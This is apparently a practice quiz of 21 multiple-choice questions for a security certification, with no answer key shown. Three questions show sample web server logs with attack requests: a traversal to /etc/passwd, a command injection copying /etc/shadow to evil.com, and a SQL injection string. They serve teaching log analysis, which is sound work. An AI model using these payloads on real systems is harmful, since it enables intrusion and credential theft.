Domain 1 Quiz

  1. Assign the attack names (a through d) to the descriptions (1 through 4). You use each attack name once. Answer in the form "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
    Descriptions:
    1. Walking down the street, you get advertising messages from stores you are walking past
    2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
    3. You receive text messages containing random advertisements
    4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
    Attack names:
    a. SPIM
    b. Bluesnarfing
    c. Vishing
    d. Bluejacking
  2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
    1. Improper account configuration
    2. Memory leak
    3. Buffer overflow
    4. Integer overflow
    5. Race condition
  3. You are equipping a forensics team. Which of these would be most useful?
    1. A set of precision screwdrivers
    2. A cheap camera
    3. Luminol
    4. Latex gloves and masks
  4. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  5. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  6. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  7. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  8. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 netgear
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
  9. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
    1. Clickjacking
    2. Ransomware
    3. Crimeware
    4. Extortionware
    5. Spyware
  10. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 corpnet3
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
  11. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
    1. False-positive event
    2. False-negative event
    3. Zero-day event
    4. IDS failure event
    5. IPS failure event
  12. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
    1. APT
    2. Rootkit
    3. Rogue AP
    4. Replay
  13. Desmond, a network engineer, has been directed to set up network security that will require a device to authenticate itself onto the network and verify that patching and anti-virus signatures are updated, before allowing the user to try to authenticate. What should Desmond use?
    1. 802.1i
    2. 802.1x
    3. 802.1q
    4. 802.11i
  14. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
  15. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer. In fact, you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
  16. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
  17. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She has identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
  18. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
  19. Jermain has been trying to print a document on a nearby printer. It is operational: from time to time it produces a print job, and someone from several offices down the hall arrives to collect their output. What is probably responsible? Select two.
    1. Bluesnarfing
    2. Bluesmacking
    3. Bluejacking
    4. Jamming
    5. Bluesniffing
  20. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
  21. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling
